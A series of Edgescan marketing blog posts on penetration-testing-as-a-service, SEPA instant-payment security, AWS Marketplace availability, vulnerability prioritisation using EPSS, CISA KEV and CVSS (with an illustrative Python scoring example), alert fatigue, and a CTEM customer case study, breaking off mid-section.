You've just identified a critical application that needs penetration testing. Maybe it's for compliance, maybe you're launching a new product, or perhaps you're in the middle of an acquisition. Whatever the reason, you need results fast. But here's the reality: traditional penetration testing approaches can leave you waiting months for answers you needed yesterday.
#### The Traditional Penetration Testing Bottleneck

The conventional penetration testing process creates a frustrating timeline that can derail business-critical initiatives, which is particularly dangerous in today's threat landscape, where 40,009 new CVEs were published in 2024 alone, a record-breaking year for vulnerability discoveries.

Week 1-2: The Questionnaire Marathon. Your security team receives a detailed form requiring extensive application documentation. How many URLs? How many pages per subdomain? How many forms? What are the authentication workflows? This scoping exercise alone can take a week or more to complete accurately.

Week 3-4: Pricing and Approval. Because each application is scoped individually based on size and complexity, you're now navigating internal approval processes for varying costs. A small application might cost X, while a larger one costs 3X. Each requires separate justification and sign-off.

Week 5-10: The Lead Time. Once approved, you join the queue. Most traditional penetration testing firms have lead times of 4-7 weeks for new clients. Your urgent need just became a future problem.

Week 11-14: Testing and Reporting. The actual penetration test takes about a month, followed by report generation and delivery. By the time you receive results, you're looking at 3-4 months from initial identification to actionable insights. In today's fast-moving business environment, that timeline can be devastating.

#### When Speed Actually Matters

This delay isn't just an inconvenience; it creates real business risks, especially given the current threat landscape.

Compliance Deadlines: "Oh no, we need our penetration test completed before the end of Q2" is a conversation happening in security offices worldwide. Regulatory requirements don't wait for convenient testing schedules. With PCI DSS requiring quarterly scans and 32% of PCI failures being high or critical severity, delays can mean compliance violations.
Active Exploitation Timeline: According to our 2025 Vulnerability Statistics Report, 768 CVEs were publicly reported as exploited for the first time in 2024, a 20% increase from 2023. When vulnerabilities are being actively exploited in the wild, waiting months for assessment results isn't just inefficient, it's dangerous.

Merger and Acquisition Activities: When you're acquiring a company or selling to a new enterprise client, security assessments are often prerequisites. Delays in testing can derail million-dollar deals or force unfavorable negotiating positions. Our data shows that organizations have an average Mean Time to Remediation (MTTR) of 74.3 days for high and critical application vulnerabilities, a delay that can't be absorbed into M&A timelines.

New Product Launches: Your development team has built something revolutionary, but it can't go live until it's been thoroughly tested. Every week of delay is lost revenue and competitive advantage. This is particularly critical when you consider that SQL injection still represents 28.28% of all critical and high severity vulnerabilities discovered, yet these are entirely preventable with parameterized queries and are reliably found by proper testing.

Due Diligence Discoveries: We once helped a client avoid a costly mistake during an acquisition. They needed rapid testing of a target company's infrastructure. Our assessment revealed serious vulnerabilities that saved them over a million dollars on the purchase price. That value only existed because we could deliver results quickly.

#### A Better Approach: The Enterprise Testing Model

Forward-thinking organizations are solving this problem through what we call "bucket allocation", a fundamentally different approach to penetration testing at scale. The data supports this shift: our research shows that large enterprises maintain a vulnerability backlog in which 45.4% of discovered vulnerabilities remain unpatched after 12 months, with 17.4% being high or critical severity.
This backlog problem is directly related to the inability to test and remediate quickly.

Simplified Application Definition: Instead of complex scoping questionnaires, applications are defined simply: one root domain plus all subdomains, with one authentication workflow included. Clean, straightforward, predictable.

Flat-Rate Pricing: Every application costs the same, regardless of size or complexity. This eliminates the pricing delays and makes budgeting predictable.

Continuous Scanning Foundation: All applications start with ongoing vulnerability scanning licenses. This means that when you need a penetration test, half the work is already done: we have current baseline assessments and understand your environment. Given that network/host vulnerabilities show an average MTTR of 54.8 days compared to 74.3 days for applications, this continuous approach significantly accelerates the overall process.

On-Demand Testing: When you identify the need for a penetration test, you simply allocate one from your pre-purchased bucket. Testing can begin within weeks instead of months, and results are delivered immediately upon completion.

#### The Organizational Control Advantage

Large organizations face an additional challenge: coordination across multiple teams and geographies. Development teams in different countries, security engineering groups across regions, and varying approval authorities create complexity that traditional testing models can't handle efficiently.

The bucket approach solves this through tenancy management. Security leaders can allocate testing licenses to different teams at the beginning of the year: marketing gets two tests, finance gets three, the European development team gets five. Each team can use its allocated tests when needed without going through lengthy approval processes. Leaders maintain oversight through automated notifications: "Team Europe just used one of their five allocated tests on the new customer portal.
Testing begins Monday, results expected by Friday." This visibility enables better planning and ensures nothing falls through organizational cracks. The Four Pillars of Successful Testing Programs Every effective security testing program requires four elements: depth, visibility, accuracy, and scale. Traditional approaches force you to choose, you can have depth and accuracy, but it takes forever and doesn't scale. Or you can have speed and scale, but sacrifice thoroughness. The bucket model delivers all four simultaneously. You get the deep, manual assessment quality of traditional penetration testing with the speed and scale of automated solutions, all while maintaining complete visibility into your testing program across the enterprise. This is particularly important given current vulnerability trends: across the full stack, 33% of discovered vulnerabilities are critical or high severity. However, the distribution varies significantly. While only 14.8% of web application and API vulnerabilities are critical or high severity, network and infrastructure vulnerabilities show 32.2% at these severity levels. This difference underscores why organizations need both continuous scanning and on-demand deep testing capabilities. Moving Forward The question isn't whether your organization needs penetration testing, it's whether you can afford to wait months for results when business needs arise. In a world where cyber threats evolve daily and business opportunities emerge weekly, your security testing approach should enable rapid response, not create bottlenecks. Consider the current threat landscape: vulnerabilities with an EPSS score above 0.7 (indicating a 70%+ probability of exploitation) show an average MTTR of 115.7 days, while lower-probability vulnerabilities average 109.4 days. The difference is minimal, suggesting that organizations aren't effectively prioritizing based on actual exploit risk. 
Meanwhile, 320 vulnerabilities were added to the CISA Known Exploited Vulnerabilities catalog in 2024 alone.

Consider this: if you discovered tomorrow that a critical application needed testing for a compliance audit next month, could your current approach deliver? If you're planning an acquisition that requires security due diligence, can you get reliable results quickly enough to inform your negotiating position?

The cost of slow testing isn't just time. It's missed opportunities, compromised negotiations, and delayed innovations. In cybersecurity, speed and accuracy aren't opposing forces; they're both essential for success.

Want to learn more about implementing rapid penetration testing for your organization? Let's discuss how this approach might work for your specific needs and timeline requirements.

### Fast Money, Loose Ends? SEPA Instant Payments Regulation Security

Europe is eliminating payment delays. The Single Euro Payments Area (SEPA) is an EU initiative that makes it easy for people and businesses to send and receive euro payments safely across Europe. The SEPA Instant Payment Regulation (IPR) is an EU regulation that ensures every citizen and business can send and receive money within seconds, any day of the year. Banks across the Eurozone must now process payments within 10 seconds, operate 24/7/365, and match fees to regular SEPA transfers. The first compliance deadline hit January 9, 2025. More follow through 2027.

But speed creates security challenges. When money moves instantly, there's no time to catch fraud or reverse suspicious transactions. Financial institutions face new risks while racing to meet regulatory deadlines.

#### The SEPA IPR Requirements

The regulation demands specific capabilities:

• 10-Second Processing: All instant payments must complete within 10 seconds. No exceptions.
• Always-On Availability: Systems operate 24/7/365, including holidays and weekends.
• Real-Time Verification: Banks must verify IBAN and name matches instantly.
• Live Sanctions Screening: Compliance checks happen in real time without delays.
• Fee Parity: Instant payment costs cannot exceed regular SEPA transfer fees.

#### Compliance Timeline Reality

Eurozone banks face immediate pressure:

• Receive instant payments: already required (January 9, 2025)
• Send instant payments: October 9, 2025
• IBAN/name verification: October 9, 2025

Non-eurozone countries have until 2027, but preparation starts now.

#### Security Challenges of Instant Money

Speed introduces new attack vectors and operational risks:

• No Reversal Window: Traditional fraud detection often relies on processing delays. Instant payments eliminate this safety net.
• Expanded Attack Surface: New APIs, modified infrastructure, and real-time processing systems create additional vulnerability points.
• 24/7 Operational Risk: Continuous availability means no maintenance windows for security updates or system hardening.
• Real-Time Processing Pressure: Sanctions screening and verification must happen instantly, potentially creating shortcuts in security protocols.

#### Beyond Compliance: Building Secure Payment Infrastructure

Meeting SEPA IPR requires more than feature development. Financial institutions need security frameworks that match the speed and availability demands.

• Continuous Assessment: Traditional quarterly security reviews don't work when systems change rapidly to meet regulatory deadlines. Continuous vulnerability scanning identifies issues as they emerge.
• API Security Focus: Instant payments rely heavily on API integrations for real-time processing. These interfaces become primary attack targets and require specialized security testing.
• Zero-Downtime Testing: With 24/7 operational requirements, security testing must happen without service interruption. This demands sophisticated testing approaches that work in live environments.
• Rapid Remediation: When vulnerabilities are found in always-on systems, fixes must happen quickly without breaking instant payment availability.

#### Practical Security Measures

Financial institutions preparing for SEPA IPR should consider specific security practices:

• Scope Expansion: Include all new and modified systems, APIs, and applications in security assessments. The rapid infrastructure changes made for IPR compliance often introduce overlooked vulnerabilities.
• Retesting Protocols: Verify that all identified vulnerabilities are fully resolved. With tight compliance deadlines, incomplete fixes create ongoing risk.
• Real-World Attack Simulation: Test how security measures perform under actual attack conditions, not just compliance scenarios.

According to the 2025 Edgescan Vulnerability Statistics Report, API-related vulnerabilities account for a significant portion of critical security findings. With SEPA IPR's heavy reliance on API infrastructure, this risk becomes particularly relevant for financial institutions.

#### How Edgescan Secures Instant Payment Infrastructure

SEPA IPR compliance demands security solutions built for 10-second processing speeds with zero downtime. Edgescan's approach addresses these specific challenges:

• API Security for Real-Time Processing: SEPA IPR systems rely heavily on APIs for instant transactions. Edgescan provides comprehensive API discovery that continuously detects APIs across your external footprint, manual API penetration testing by certified experts, and continuous API vulnerability assessment with human-validated risks. Our cloud coverage ensures security across the hybrid and multi-cloud infrastructures that instant payment systems require.
• Continuous Vulnerability Management: Edgescan delivers continuous vulnerability scanning and assessment across both network infrastructure and application layers. This matters for SEPA IPR because systems change rapidly to meet compliance deadlines, and traditional quarterly assessments miss emerging risks.
• Expert-Led Penetration Testing: Edgescan's hybrid vulnerability management combines automated scanning with expert-led penetration testing services. Our certified professionals uncover hidden vulnerabilities that automated scans miss, which is critical for instant payment systems where a single flaw can expose real-time transactions.
• Risk-Based Prioritization: Edgescan prioritizes vulnerabilities based on criticality, exploitability, and business impact. For SEPA IPR environments, this means focusing remediation efforts on threats that could disrupt instant payment availability or compromise transaction security.
• Remediation Validation: Once vulnerabilities are fixed, Edgescan retests to confirm they've been fully resolved. This verification is essential for always-on instant payment systems where incomplete fixes create ongoing risk.
• PCI-Level Standards: While not directly linked to SEPA IPR, Edgescan is a certified PCI ASV (Approved Scanning Vendor). We meet the rigorous industry standards set by the PCI Security Standards Council, providing additional assurance of quality, credibility, and alignment with financial services best practices.

#### The Security-Speed Balance

SEPA IPR forces a fundamental question: how do you secure systems that must operate at unprecedented speed and availability?

The answer isn't choosing between security and compliance. It's building security measures that enhance rather than hinder instant payment capabilities. This requires tools and processes designed for the new reality of always-on, real-time financial infrastructure.

Ready to secure your instant payment infrastructure? Start here.
### Edgescan Now on AWS Marketplace: Seamless Security Testing, Natively Integrated with AWS

As cloud-native infrastructure becomes the standard for modern enterprises, the demand for scalable, integrated security solutions has never been greater. That's why we're excited to announce that Edgescan is now available on the AWS Marketplace, making it easier than ever for AWS customers to access our award-winning Penetration Testing as a Service (PTaaS) and vulnerability management solution.

Built natively on AWS, Edgescan delivers continuous, intelligent security testing that aligns with the way today's organizations build, deploy, and manage applications in the cloud.

#### Why Choose Edgescan on AWS Marketplace?

By choosing Edgescan on AWS Marketplace, customers benefit from streamlined procurement, simplified billing through their existing AWS account, and the ability to integrate seamlessly into their AWS-native environments.

But this isn't just about availability. Edgescan has deep strategic alignment with AWS across architecture, integrations, and features that amplify value for AWS users:

#### Native AWS Integrations

Edgescan is built to integrate naturally into your AWS ecosystem. We support key AWS services to help you automate and enhance security workflows across your CI/CD pipeline and cloud infrastructure:

• Cloudhook Integration: Our Cloudhook for AWS allows Edgescan to automatically discover and monitor ephemeral assets spun up or down in AWS environments, enabling real-time visibility and testing without manual intervention.
• AWS Resource Tagging Support: We fully support AWS-native tagging, enabling customers to track and organize assets by environment, owner, or function, including the short-lived or ephemeral IPs common in autoscaling and serverless environments.
• Auto Asset Discovery via AWS APIs: Edgescan can ingest asset data directly via AWS APIs to identify exposed services and applications, reducing the attack surface through proactive scanning.

#### Hosted Securely on AWS

Edgescan is hosted on AWS, giving you the peace of mind that your security solution is backed by AWS's resilient, globally distributed infrastructure. This ensures enterprise-grade scalability, high availability, and compliance with the most rigorous security and data protection standards.

Whether your workloads are running in Amazon EC2, AWS Lambda, Amazon EKS, or multi-cloud architectures, Edgescan scales effortlessly to meet your dynamic cloud security needs.

#### Continuous Testing Meets Continuous Delivery

With Edgescan's DAST + PTaaS model, your AWS-hosted applications benefit from continuous, validated security testing. Our platform merges automated vulnerability scanning with manual expert validation, giving you high-fidelity results without the noise of false positives.

And thanks to our bi-directional API, Edgescan integrates directly with your AWS-native and DevOps tooling, allowing you to orchestrate security testing as code.

#### Benefits of Using Edgescan via AWS Marketplace

• Faster procurement through AWS billing
• Built-in compatibility with AWS-native tools
• Automated visibility of cloud-native assets
• Tag-based asset management for scalable organization
• Security testing that scales with your infrastructure

#### Final Thoughts

Bringing Edgescan to the AWS Marketplace is more than a convenience; it's a strategic enhancement for any AWS-centric organization looking to mature its cloud security posture. Whether you're operating a modern CI/CD pipeline or managing complex hybrid-cloud infrastructure, Edgescan helps you stay secure, agile, and audit-ready.

Start your Edgescan journey today on AWS Marketplace and bring continuous, validated security testing directly into your AWS-native environment.

### Breaking the Penetration Testing Bottleneck with Edgescan's PTaaS

Enterprises deploy code weekly. Some push changes daily. But traditional penetration testing still operates on quarterly schedules, creating dangerous security gaps and development delays.

The numbers tell the story. According to Edgescan's 2025 Vulnerability Statistics Report, organizations take an average of 74.3 days to remediate application vulnerabilities. Meanwhile, 14.8% of application and API vulnerabilities are critical or high severity, and these require immediate attention, not quarterly assessment.

The old model is broken. Schedule a test, wait for availability, discover the same technical flaws repeatedly, rush through business logic assessment, then wait weeks for a report. Meanwhile, new code ships with unknown vulnerabilities.
Modern development demands modern security testing that keeps pace with agile cycles without sacrificing depth or accuracy.

#### The Penetration Testing Logjam

Traditional pen testing creates bottlenecks that slow innovation, and the data proves the impact:

Limited Expert Availability: Security experts spend time rediscovering common technical vulnerabilities instead of focusing on complex threats. The 2025 report shows SQL injection still accounts for 28.28% of all critical and high severity application vulnerabilities, easily discoverable flaws that consume expert time.

Point-in-Time Assessment: Testing happens once per quarter or release cycle, leaving long periods without security validation. With application vulnerability remediation averaging 74.3 days, quarterly testing means critical issues can persist for months.

Rushed Business Logic Testing: Time constraints force testers to focus on easily discoverable flaws rather than sophisticated attack scenarios. The report reveals that 20% of critical vulnerabilities found through PTaaS are "unauthenticated access to sensitive resources", complex issues that automation misses.

Delayed Reporting: Lengthy report generation delays remediation while new vulnerabilities accumulate. Given that larger enterprises leave 45.4% of vulnerabilities unresolved after 12 months, every delay compounds the backlog.

This reactive approach fails enterprises that need continuous security validation alongside rapid development cycles.

#### Edgescan's Frontloaded PTaaS Solution

Edgescan transforms penetration testing by frontloading the process with continuous, validated Dynamic Application Security Testing (DAST). This approach filters out routine vulnerabilities before human experts engage.

Continuous Validated Scanning: Intelligent DAST scanners continuously probe applications for common technical vulnerabilities. Security analysts validate each finding, ensuring high accuracy and eliminating false positives.

Automated Routine Discovery: Automation handles detection of well-known vulnerabilities like SQL injection, cross-site scripting, and misconfigurations. This frees human testers from repetitive tasks.

Expert Focus on Complex Threats: With technical noise filtered out, security experts dive directly into sophisticated assessments: privilege escalation, workflow bypasses, authorization flaws, and business logic vulnerabilities that automation cannot detect.

Rapid, Meaningful Results: Testing cycles shorten dramatically while depth increases. Experts spend time on high-value targets instead of rediscovering basic flaws.

#### Enterprise Benefits

Development Velocity: Shortened testing cycles enable faster releases without compromising security quality. When the average remediation time is 74.3 days for applications, continuous testing identifies issues earlier in the development cycle.

Scalable Coverage: Continuous scanning scales effortlessly across large application portfolios and complex environments. The report shows that malicious file upload vulnerabilities account for 13.56% of critical application flaws, issues that require consistent monitoring across all applications.

Expert Efficiency: Human testers focus on sophisticated threats that require contextual understanding and creative attack techniques. PTaaS discovered business logic weaknesses and exploitation in 11% of critical findings, vulnerabilities that pure automation cannot detect.

Reduced Alert Fatigue: Validated findings eliminate false positives, reducing remediation fatigue and improving team focus. With 92% of Edgescan's validation happening through automation and only 8% requiring human intervention, teams get accurate results without noise.

Integrated Security: Security becomes a continuous part of the software development lifecycle rather than a checkpoint that delays releases.

#### The Strategic Advantage

Edgescan's PTaaS model removes traditional penetration testing bottlenecks by combining automation efficiency with human expertise. The latest data shows this approach works: while traditional methods struggle with the volume of vulnerabilities (over 40,009 new CVEs published in 2024), frontloaded testing focuses expert attention where it matters most.

Continuous validated scanning provides proactive security coverage that scales with modern development practices. This approach delivers real risk reduction while maintaining development velocity, something traditional testing models cannot achieve when facing an average remediation backlog in which 45.4% of vulnerabilities remain unresolved.

Ready to break your penetration testing bottleneck? Start here.

### How Edgescan's EXF Solves Vulnerability Prioritization with EPSS and CISA KEV

Security teams face an impossible challenge. Thousands of vulnerabilities flood their dashboards daily. Most will never be exploited. But buried in that noise are the critical threats that attackers will target next.

Traditional CVSS scores don't solve this problem. A vulnerability rated 9.8 might sit harmlessly for years while a 6.5-rated flaw gets weaponized tomorrow. Security teams need better intelligence to separate real threats from theoretical risks.

That's why Edgescan created the eXposure Factor (EXF), a unified risk score that combines multiple intelligence sources to identify the vulnerabilities that actually matter.

#### The Prioritization Problem

Most vulnerability management relies on CVSS scores alone. These technical severity ratings tell you how bad a vulnerability could be, but not how likely it is to be exploited. The result? Security teams waste time patching theoretical risks while missing active threats.

Organizations need to know which vulnerabilities attackers are actually using. They need predictive intelligence about emerging threats.
And they need this intelligence distilled into actionable priorities that fit their limited resources.

#### What Makes EXF Different

EXF evaluates vulnerability risk on a scale from 0 to 100 by intelligently combining three data sources:

EPSS (Exploit Prediction Scoring System) uses machine learning to estimate exploitation probability. It's forward-looking and data-driven, helping identify vulnerabilities likely to be exploited soon. However, statistical modeling can sometimes overestimate or underestimate risk.

CISA KEV (Known Exploited Vulnerabilities) catalogs vulnerabilities confirmed to be exploited in the wild. This provides ground-truth validation of active threats, but it's reactive and limited to known exploits.

CVSS (Common Vulnerability Scoring System) adds technical severity context to complete the risk picture.

#### The Power of Combined Intelligence

By fusing these data sources, EXF delivers more nuanced and actionable risk scores than any single metric alone:

Predictive Foresight: EPSS identifies vulnerabilities gaining attacker attention before they appear in exploit kits or active campaigns.

Real-World Validation: CISA KEV ensures that confirmed active threats receive immediate priority, regardless of other factors.

Technical Context: CVSS severity helps teams understand potential impact alongside exploitation likelihood.

This layered approach enables organizations to reduce false positives, focus on vulnerabilities with both high likelihood and high impact, and shorten mean time to remediation.

#### Practical Impact

EXF helps security teams defend more effectively against ransomware and other real-world threats by prioritizing vulnerabilities that attackers actually target. Instead of chasing theoretical risks, teams can focus their limited resources on threats that matter. The result is faster remediation of critical exposures, reduced alert fatigue, and stronger defense against active attack campaigns.
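To make the fusion concrete, here is an added example written for this page. It is not Edgescan's code and not the actual EXF formula (whose weighting is not published here); it assumes a simple blend in which likelihood comes from EPSS but is pinned to 1.0 when the CVE is in CISA KEV, impact comes from the CVSS base score, and the weights (0.6 and 0.4) and remediation tiers are assumptions. It also implements the MTTR-by-EPSS-bucket check from the "Moving Forward" section of the rapid-testing post above, so a team can test on its own findings whether high-likelihood issues really are being closed faster. All CVE ids, dates and scores below are constructed sample data.

```python
"""Added example: fuse EPSS, CISA KEV membership and CVSS into one 0-100
priority, then check whether remediation speed tracks exploit likelihood.
Not Edgescan's implementation; weights, tiers and sample data are assumptions."""
from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import Optional

# Assumed weights: likelihood dominates impact, so a probable exploit of a
# medium-severity bug outranks an improbable exploit of a critical one.
W_LIKELIHOOD = 0.6
W_IMPACT = 0.4


@dataclass
class Finding:
    cve: str                      # placeholder ids, constructed for this example
    cvss: float                   # CVSS base score, 0.0-10.0
    epss: float                   # EPSS probability, 0.0-1.0
    in_kev: bool                  # listed in the CISA KEV catalog?
    discovered: date
    remediated: Optional[date] = None


def fused_score(f: Finding) -> float:
    """Illustrative 0-100 score (assumed formula, not EXF). KEV membership is
    ground truth, so it pins likelihood to 1.0 regardless of the EPSS
    prediction; otherwise the EPSS probability is used. CVSS supplies impact."""
    if not (0.0 <= f.cvss <= 10.0 and 0.0 <= f.epss <= 1.0):
        raise ValueError(f"{f.cve}: CVSS or EPSS out of range")
    likelihood = 1.0 if f.in_kev else f.epss
    impact = f.cvss / 10.0
    return round(100.0 * (W_LIKELIHOOD * likelihood + W_IMPACT * impact), 1)


def tier(score: float) -> str:
    """Assumed remediation tiers. Every KEV entry lands in 'immediate'
    because its score is at least 100 * W_LIKELIHOOD = 60."""
    if score >= 60.0:
        return "immediate"
    if score >= 30.0:
        return "scheduled"
    return "backlog"


def prioritize(findings):
    """Return (cve, score, tier) tuples sorted highest risk first."""
    ranked = sorted(findings, key=fused_score, reverse=True)
    return [(f.cve, fused_score(f), tier(fused_score(f))) for f in ranked]


def mttr_by_epss(findings, threshold=0.7):
    """Mean days-to-remediate for closed findings above and at/below the EPSS
    threshold. If 'high' is not clearly lower than 'low', the team is not
    remediating by exploit likelihood; open findings are excluded."""
    buckets = {"high": [], "low": []}
    for f in findings:
        if f.remediated is None:
            continue
        days = (f.remediated - f.discovered).days
        buckets["high" if f.epss > threshold else "low"].append(days)
    return {k: (round(mean(v), 1) if v else None) for k, v in buckets.items()}


# Constructed sample findings (ids and values are illustrative, not real data).
SAMPLE = [
    Finding("CVE-0000-0001", 9.8, 0.02, False, date(2025, 1, 6), date(2025, 4, 1)),
    Finding("CVE-0000-0002", 6.5, 0.91, False, date(2025, 1, 6), date(2025, 3, 17)),
    Finding("CVE-0000-0003", 5.3, 0.12, True, date(2025, 1, 6), date(2025, 1, 20)),
    Finding("CVE-0000-0004", 4.3, 0.01, False, date(2025, 1, 6)),
]

if __name__ == "__main__":
    for cve, score, t in prioritize(SAMPLE):
        print(f"{cve}  score={score:5.1f}  {t}")
    print("MTTR by EPSS bucket:", mttr_by_epss(SAMPLE))
```

Run as a script to print the ranked list. On the constructed sample the KEV entry (score 81.2) and the high-EPSS medium (80.6) both land in the immediate tier above the CVSS 9.8 finding (40.4), which is the re-ordering the post argues for; and the high-EPSS bucket's MTTR (70 days) is not lower than the low bucket's (49.5 days), which is exactly the mis-prioritization signal the statistics report describes.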
#### Strategic Vulnerability Management

In a world where security teams are stretched thin, EXF provides a smarter way to manage risk. By combining the predictive power of EPSS with the real-world accuracy of CISA KEV, enhanced by CVSS technical context, EXF helps organizations stay ahead of attackers rather than just react to them.

Effective vulnerability prioritization isn't about fixing everything; it's about fixing the right things first.

Ready to prioritize vulnerabilities that actually matter? Start here.

### How Edgescan Cuts Through Alert Fatigue with Validated Intelligence

Security teams are drowning in alerts. False positives consume 25% of their time as they investigate phantom threats. Critical vulnerabilities get buried in noise. Real attacks slip through while teams chase ghosts.

Alert fatigue isn't just annoying, it's dangerous. When everything looks urgent, nothing gets the attention it deserves. Security teams need a way to separate signal from noise.

#### The False Positive Problem

Traditional vulnerability scanners generate thousands of alerts. Many are false positives. Others lack context about real-world exploitability. Security teams spend hours investigating alerts that don't matter while missing the ones that do.

According to Forrester's Total Economic Impact study, reducing false positives by just 50% saves hundreds of hours annually. That translates into significant cost savings and faster incident response when real threats emerge.

#### Edgescan's Validated Intelligence Approach

Edgescan combines automated vulnerability detection with human validation and AI-powered analytics. Every alert is verified before it reaches your team. This hybrid approach ensures alerts are real, relevant, and actionable.

Human Expert Validation: Our certified penetration testing team verifies vulnerabilities that require the human touch, specifically critical severity or complex contextual exposures.

AI Insights from Clean Data: Our AI leverages a dataset of validated vulnerabilities, not noisy scan results. This delivers hyper-accurate tactical advice tailored to your environment, including faster triage with context-aware recommendations and actionable remediation steps aligned with your tech stack.

Intelligent Prioritization: The platform combines CVSS scores with real-world exploitability data, CISA KEV listings, and EPSS ratings to focus attention on the vulnerabilities that matter most.

Automated validation covers 92% of all vulnerabilities using cyber analytics coupled with AI for prioritisation, accuracy and scale. The remaining 8% are verified by cyber experts and penetration testers.

#### The Scale of the Challenge

According to the 2025 Edgescan Vulnerability Statistics Report, over 33% of discovered vulnerabilities were critical or high severity. The mean time to remediate was 74.3 days for applications and APIs and 54.8 days for network infrastructure.

More concerning: larger enterprises left 45.4% of discovered vulnerabilities unresolved after 12 months. This highlights the critical need for better prioritization and validation to help teams focus their limited resources effectively.

#### Unified Platform Advantage

Edgescan delivers comprehensive security visibility through a single platform rather than multiple disconnected tools:

Attack Surface Management provides continuous discovery and monitoring of your external digital footprint. Unknown assets and shadow IT get identified before attackers find them.

Full-Stack Coverage spans web applications, APIs, network infrastructure, and cloud environments. Complete visibility across your technology stack eliminates blind spots.

Validated Intelligence ensures every finding is verified by expert analysts, supported by technology that leverages millions of triaged vulnerabilities. This enables rapid, consistent, and accurate validation.

This integrated approach means fewer tools to manage, fewer coverage gaps, and a single source of truth for vulnerability intelligence. The result is faster response times, better prioritization, and stronger security outcomes.

#### Proven Results

Edgescan's effectiveness shows in user feedback and measurable outcomes:

G2 Rating: 4.9/5, with users consistently praising accuracy, ease of use, and the value of validated results.

Gartner Peer Insights: 4.6/5 rating, with 96% of reviewers recommending the platform for its efficiency and reliability.

Real-World Impact: Security teams report significant time savings, reduced alert fatigue, and improved focus on threats that actually matter.

#### Beyond Traditional Scanning

In a world where security teams are stretched thin, Edgescan helps you focus on real threats and act confidently. The platform combines AI-driven insights, attack surface management, and full-stack visibility with intelligence validated by expert analysts.

This isn't just another vulnerability scanner; it's a strategic advantage that transforms how security teams prioritize and respond to threats.

Ready to cut through the noise? Start here.

### How Edgescan's CTEM Secured a Global CRM Firm's Hidden Attack Surface

A global CRM firm managing sensitive customer data across thousands of web applications and APIs discovered it had a problem. Dozens of websites and APIs were running without any security oversight. Critical business systems had never been tested. Their sprawling cloud infrastructure created new blind spots every day. The firm needed complete visibility into its attack surface and a way to manage security at scale.
To solve these challenges, it turned to Edgescan's Continuous Threat Exposure Management (CTEM) approach.

#### The Hidden Risk Problem

The firm's security team faced multiple critical gaps:

Unknown Assets Everywhere: Dozens of websites and APIs operated without security assessment or vulnerability scanning. These shadow assets handled sensitive customer data but remained invisible to security teams.

Critical API Exposure: Business-critical APIs had no security oversight. Industry reports show that APIs account for 90% of web application attacks, which creates significant risk.

Cloud Deployment Chaos: Rapid cloud deployments created constant blind spots. New assets appeared faster than security teams could track them.

Scale vs. Accuracy: The firm needed to assess thousands of applications without drowning in false positives or missing real threats.

#### Edgescan's CTEM Solution

Edgescan's unified security platform combines External Attack Surface Management (EASM), Risk-Based Vulnerability Management (RBVM), and Penetration Testing as a Service (PTaaS) to create comprehensive threat exposure management.

Complete Asset Discovery: Edgescan's EASM solution conducts continuous asset profiling across the firm's entire digital estate. We mapped their complete attack surface using the Host Index, Discovery & Enumeration (HIDE) service, uncovering previously unknown websites and APIs. The platform integrates with AWS, Azure, and GCP to ensure that no internet-facing assets go unnoticed, eliminating shadow IT exploitation risks.

API Security at Scale: Our API Security Testing module discovered tens of APIs, including several critical to core operations. Using patented multi-layer probing technology, we identified known and rogue APIs, mapping endpoints and assessing vulnerabilities like mass assignment and authorization flaws. The platform consumes OpenAPI, Swagger, and GraphQL files for thorough assessment, flagging high-severity issues for immediate remediation.

Seamless Workflow Integration: New assets integrate into security assessment schedules with a single click. The firm can instantly add websites, APIs, or other assets to RBVM or PTaaS schedules. This automation eliminates manual overhead while maintaining continuous vulnerability scanning across their expanded attack surface.

Real-Time Cloud Monitoring: EASM delivers continuous visibility into dynamic cloud deployments. The platform monitors IP ranges, domains, and subdomains, detecting new assets as they deploy. Customizable notifications via email, SMS, or webhooks alert teams to changes immediately.

Hybrid Assessment Accuracy: Edgescan's approach combines automation with human expertise to assess thousands of applications efficiently. Our Dynamic Application Security Testing (DAST) and Network Vulnerability Management (NVM) provide full-stack coverage without compromising accuracy. The validation engine queries millions of vulnerability examples from our data lake, auto-committing low-severity issues and flagging critical ones for expert review. This eliminates false positives while delivering clear, actionable results.

On-Demand Expert Testing: For critical applications and APIs, PTaaS offers rapid penetration testing by certified OSCP and CREST security experts. Deep assessments simulate real-world attacks to identify business logic flaws and exploitable vulnerabilities. The firm can schedule tests anytime, with unlimited retesting at no additional cost to verify remediation.

#### Measurable Results

Complete Visibility: We uncovered and secured dozens of previously unknown websites and dozens of APIs, closing critical security gaps that had existed for months.

Risk Reduction: Critical API vulnerabilities were identified and remediated before they could be exploited, preventing potential data breaches.

Operational Efficiency: One-click asset integration streamlined security workflows, saving the security team hours of manual work weekly.

Proactive Protection: Continuous monitoring ensured new cloud deployments were assessed immediately, minimizing exposure windows.

Zero False Positives: The firm assessed thousands of assets accurately, maintaining clear vulnerability prioritization without noise.

Rapid Response: PTaaS enabled deep testing of critical assets within days, strengthening defenses against emerging threats.

#### What the Client Said

"Edgescan's CTEM approach transformed our security program. Their ability to discover unknown assets, scale assessments, and provide on-demand penetration testing gave us confidence in our defenses. The clarity of their results and ease of integrating new assets into our security cadence have been transformational." – IT SECURITY MANAGER, GLOBAL CRM FIRM

#### The CTEM Advantage

Modern enterprises can't secure what they can't see. Edgescan's CTEM framework provides the visibility, scale, and accuracy needed to manage complex attack surfaces effectively. Combining continuous discovery, risk-based assessment, and expert validation, we help organizations stay ahead of evolving threats while maintaining operational efficiency.

Ready to secure your complete attack surface? Start here.

### Edgescan's License Suggestions: Getting More Bang for Your Buck

Ever feel like you're paying too much for security testing on some applications while others might need more attention? That's a common problem for large organizations juggling hundreds or thousands of apps. At Edgescan, we've created a solution that helps you right-size your security testing.

#### The Right Testing at the Right Time

Over the past few years, we've seen a shift away from traditional annual pen testing to more flexible approaches. Instead of the old "schedule it, scope it, bill it, report it" model, our customers want something more dynamic.

The challenge is clear: if you have 500 pieces of technology, maybe 100 need full pen tests because customers or regulations demand it. But what about the other 400?
What's the right level of testing? In an ideal world, you'd pen test everything. But that's expensive and not always the best use of resources.

#### How License Suggestions Work

Our license suggestions function helps solve this problem. Here's how it works:

1. We start a piece of technology with an Essentials level license (our lowest tier).
2. We run assessments to see what's actually there.
3. Based on what we find, we recommend the appropriate level of testing.

For example, imagine a non-critical web application where you're only doing unauthenticated testing. During scanning, we discover it has authenticated portions. We might suggest upgrading to authenticated testing for better coverage. Two months later, after authenticated testing, we might find complex workflows and controls that a scanner can't adequately test. That's when we might recommend upgrading to a pen test.

The process works in reverse too. We can suggest downgrading applications that no longer need intensive testing, helping you level off spending instead of watching it constantly increase.

#### By the Numbers

We've made this work at scale. As part of our right-sizing efforts:

